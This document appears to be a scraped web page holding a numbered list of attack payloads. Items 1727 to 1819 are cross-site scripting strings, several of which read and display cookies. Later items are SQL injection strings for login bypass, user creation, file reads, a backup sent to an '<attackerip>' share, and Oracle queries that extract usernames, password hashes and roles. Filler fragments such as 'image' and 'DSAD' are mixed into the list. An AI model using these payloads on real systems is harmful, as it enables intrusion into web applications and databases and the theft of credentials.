  1727. <iframe id="ifra" src="/"></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write("<scr" + "ipt>top.foo = Object.defineProperty</scr" + "ipt>"); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>

  1728. <script>alert(document.head.innerHTML.substr(146,20));</script>

  1729. <script>alert(document.head.childNodes[3].text)</script>

  1730. <script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>

  1731. <script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>

  1732. <script>x=document.createElement("iframe");x.src="http://xssme.html5sec.org/404";x.onload=function(){window.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")};document.body.appendChild(x);</script>

  1733. <script>x=document.createElement("iframe");x.src="http://xssme.html5sec.org/404";x.onload=function(){window.frames[0].document.write("<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>")};document.body.appendChild(x);</script>

  1734. <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie\s+=\s+'(.*)'/gi); alert(RegExp.$1); } } xmlHttp.send(null); }; </script>

  1735. <script> document.getElementById("safe123").click=function()+{alert(Safe.get());} document.getElementById("safe123").click({'type':'click','isTrusted':true}); </script>

  1736. <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById("safe123").click=function()+{alert(Safe.get());} document.getElementById("safe123").click(test); </script>

  1737. <script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' + x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>

  1738. <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%3Dnew%20this.contentWindow.window.XMLHttpRequest%28%29%3Bfff.open%28%22GET%22%2C%22xssme2%22%29%3Bfff.onreadystatechange%3Dfunction%28%29%7Bif%20%28fff.readyState%3D%3D4%20%26%26%20fff.status%3D%3D200%29%7Balert%28fff.responseText%29%3B%7D%7D%3Bfff.send%28%29%3B></iframe>

  1739. <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #

  1740. <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>

  1741. <img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #

  1742. <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";getElementById("safe123").click=function()+{alert(Safe.get());};getElementById("safe123").click(test);</SCRIPT>#

  1743. <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie\s+=\s+'(.*)'/gi); alert(RegExp.$1); } } xmlHttp.send(null); }; </script>#

  1744. <script for=document event=onreadystatechange>getElementById('safe123').click()</script>

  1745. <video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";document.getElementById("safe123").click=function()+{alert(Safe.get());};document.getElementById("safe123").click(test);'><source>#

  1746. <script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>

  1747. <script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>

  1748. <iframe src="404" onload="frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

  1749. <iframe src="404" onload="content.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

  1750. <iframe src="404" onload="self.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

  1751. <iframe src="404" onload="top.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

  1752. <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#

  1753. <iframe onload="write('<script>'+location.hash.substr(1)+'</script>')"></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

  1754. <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

  1755. <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href="javascript:\"<script>var%20xhr%20%3D%20new%20XMLHttpRequest()%3Bxhr.open('GET'%2C%20'http%3A%2F%2Fhtml5sec.org%2Fxssme2'%2C%20true)%3Bxhr.onload%20%3D%20function()%20%7B%20alert(xhr.responseText.match(%2Fcookie%20%3D%20'(.*%3F)'%2F)%5B1%5D)%20%7D%3Bxhr.send()%3B<\/script>\"") autofocus></textarea>

  1756. <iframe onload="write('<script>'+location.hash.substr(1)+'</script>')"></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

  1757. <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src="javascript:parent.x(window)"><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

  1758. <textarea id=ta onfocus="write('<script>alert(1)</script>')" autofocus></textarea>

  1759. <object data="data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=">

  1760. <script>function x(window) { eval(location.hash.substr(1)) }; open("javascript:opener.x(window)")</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

  1761. <script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>

  1762. <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload="xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();">`>

  1763. <a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ+ name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>

  1764. <a target="x" href="xssme?xss=<script>addEventListener("DOMFrameContentLoaded", function(e) {e.stopPropagation();}, true);</script><iframe src="data:text/html,%3cscript%3eObject.defineProperty(top, 'MyEvent', {value: Object, configurable: true});function y() {alert(top.Safe.get());};event = new Object();event.type = 'click';event.isTrusted = true;y(event);%3c/script%3e"></iframe>

  1765. <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

  1766. <a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>

  1767. <a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src="javascript:parent.x(window);"></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

  1768. Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>

  1769. <a href="javascript:\u0061l&#101rt(1)"><button>

  1770. <div onmouseover='alert(1)'>DIV</div>

  1771. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

  1772. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?

  1773. <a href="jAvAsCrIpT:alert(1)">X</a>

  1774. <var onmouseover="prompt(1)">On Mouse Over</var>?

  1775. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?

  1776. <a href=javascript:alert(document.cookie)>Click Here</a>

  1777. <img src="/" =_=" title="onerror='prompt(1)'">

  1778. <%<!--'%><script>alert(1);</script -->

  1779. <script src="data:text/javascript,alert(1)"></script>

  1783. <input value=<><iframe/src=javascript:confirm(1)

  1784. <input type="text" value=``<div/onmouseover='alert(1)'>X</div>

  1786. <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															(
																1
																	)></iframe> ?

  1787. <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	(	1	)></iframe>

  1789. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>

  1791. <meta http-equiv="refresh" content="0;javascript:alert(1)"/>?

  1792. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?

  1793. <math><a xlink:href="//jsfiddle.net/t846h/">click

  1794. <a href="data:text/html;base64_,<svg/onload=\u0061l&#101rt(1)>">X</a

  1795. <svg contentScriptType=text/vbs><script>MsgBox+1

  1796. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

  1797. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

  1798. <script/src="data:text/j\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=/

  1799. <script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061lert(/XSS/)></script ????????????

  1800. <object data=javascript:\u0061l&#101rt(1)>

  1801. <script>+-+-1-+-+alert(1)</script>

  1802. <body/onload=<!-->&#10alert(1)>

  1803. <script itworksinallbrowsers>/*<script* */alert(1)</script ?

  1805. <svg><script>//
confirm(1);</script </svg>

  1806. <svg><script onlypossibleinopera:-)> alert(1)

  1807. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

  1809. <div/onmouseover='alert(1)'> style="x:">

  1810. <--`<img/src=` onerror=alert(1)> --!>

  1811. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script> ?

  1812. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?

  1813. "><img src=x onerror=window.open('https://www.google.com/');>

  1814. <form><button formaction=javascript:alert(1)>CLICKME

  1815. <math><a xlink:href="//jsfiddle.net/t846h/">click

  1816. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?

  1817. <iframe src="data:text/html,<script>alert(1)</script>"></iframe>

  1818. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

  1819. "><img src=x onerror=prompt(1);>

  1876. DSAD

  1881. image admin" or "1"="1"--

    DSAD

  1882. image admin" or "1"="1"#

    DSAD

  1883. image admin" or "1"="1"/*

    DSAD

  1890. image admin") or ("1"="1"--

    DSAD

  1891. image admin") or ("1"="1"#

    DSAD

  1892. image admin") or ("1"="1"/*

    DSAD

  1894. image admin") or "1"="1"--

    DSAD

  1895. image admin") or "1"="1"#

    DSAD

  1896. image admin") or "1"="1"/*

    DSAD

  1897. image 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

    DSAD

  1918. image " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055

    DSAD

  1970. image " or "1"="1"--

    DSAD

  1971. image " or "1"="1"/*

    DSAD

  1972. DSAD

  1981. image ") or "1"="1"--

    DSAD

  1982. image ") or "1"="1"/*

    DSAD

  1984. image ") or "1"="1"#

    DSAD

  1985. image ") or ("1"="1"--

    DSAD

  1986. image ") or ("1"="1"/*

    DSAD

  1987. image ") or ("1"="1"#

    DSAD

  2000. image ') or ('a'='a and hi") or ("a"="a

    DSAD

  2019. image # you will need to customize/modify some of the vaules in the queries for best effect

    DSAD

  2022. image 'create user name identified by pass123 temporary tablespace temp default tablespace users;

    DSAD

  2026. image ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

    DSAD

  2028. image ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

    DSAD

  2037. image # replace regex with your fuzzer for best results <attackerip> <sharename>

    DSAD

  2038. DSAD

  2049. image BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'

    DSAD

  2098. image create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;

    DSAD

  2099. image # fuzz interesting absolute filepath/filename into <filepath>

    DSAD

  2150. image ' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i

    DSAD

  2151. image ' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i

    DSAD

  2152. image ' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i

    DSAD

  2153. image ' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i

    DSAD

  2154. image ' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i

    DSAD

  2155. image ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i

    DSAD

  2156. image ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i

    DSAD

  2157. image ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i

    DSAD

  2158. image ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i

    DSAD

  2159. image ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i

    DSAD

  2160. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i

    DSAD

  2161. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i

    DSAD

  2162. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i

    DSAD

  2163. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i

    DSAD

  2164. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i

    DSAD

  2165. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i

    DSAD

  2166. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i

    DSAD

  2167. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i

    DSAD

  2168. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i

    DSAD

  2169. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i

    DSAD

  2170. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i

    DSAD

  2171. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i

    DSAD

  2172. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i

    DSAD

  2173. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i

    DSAD

  2174. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i

    DSAD

  2175. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i

    DSAD

  2176. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i

    DSAD

  2177. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i

    DSAD

  2178. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i

    DSAD

  2179. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i

    DSAD

  2180. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i

    DSAD

  2181. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i

    DSAD

  2182. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i

    DSAD

  2183. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i

    DSAD

  2184. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i

    DSAD

  2185. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i

    DSAD

  2186. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i

    DSAD

  2187. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i

    DSAD

  2188. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i

    DSAD

  2189. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i

    DSAD

  2190. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i

    DSAD

  2191. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i

    DSAD

  2192. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i

    DSAD

  2193. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i

    DSAD

  2194. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i

    DSAD

  2195. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i

    DSAD

  2196. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i

    DSAD

  2197. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i

    DSAD

  2198. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i

    DSAD

  2199. image ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i

    DSAD

השאר תגובה

כתובת האימייל שלך לא תפורסם. * שדות חובה מסומנים